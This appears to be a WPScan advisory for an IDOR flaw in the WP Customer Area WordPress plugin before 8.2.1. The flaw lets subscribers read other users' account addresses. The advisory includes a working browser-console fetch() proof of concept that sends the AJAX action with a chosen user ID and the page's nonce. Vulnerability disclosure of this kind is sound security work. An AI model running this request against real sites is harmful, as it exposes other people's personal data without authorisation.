WordPress Plugin Vulnerabilities
WP Customer Area < 8.2.1 - Subscriber+ Account Address Leak
Description
The plugin does not properly validates user capabilities in some of its AJAX actions, allowing any users to retrieve other user's account address.
Proof of Concept
Run the below command in the developer console of the browser when being logged in the blog as a subscriber and on your own edit account page (https://example.com/customer-area/my-account/edit-account/):
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded; charset=UTF-8",
},
"body": "action=cuar_load_address_from_owner&owner[type]=usr&owner[ids][]=__ADD_USER_ID__&address_id=home_address&cuar_nonce=" + document.querySelector('div.cuar-home-address input#cuar_nonce').value,
"method": "POST",
"mode": "cors",
"credentials": "include"
}).then((response) => {return response.text(); })
.then((data) => {
console.log(data);
});
Affects Plugins
Fixed in 8.2.1 References
CVE
Classification
Type
IDOR
OWASP top 10
CWE
Miscellaneous
Original Researcher
Krzysztof Zając (CERT PL)
Submitter
Krzysztof Zając (CERT PL)
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-01-10 (about 4 months ago)
Added
2024-01-10 (about 4 months ago)
Last Updated
2024-01-16 (about 3 months ago)
WPScan 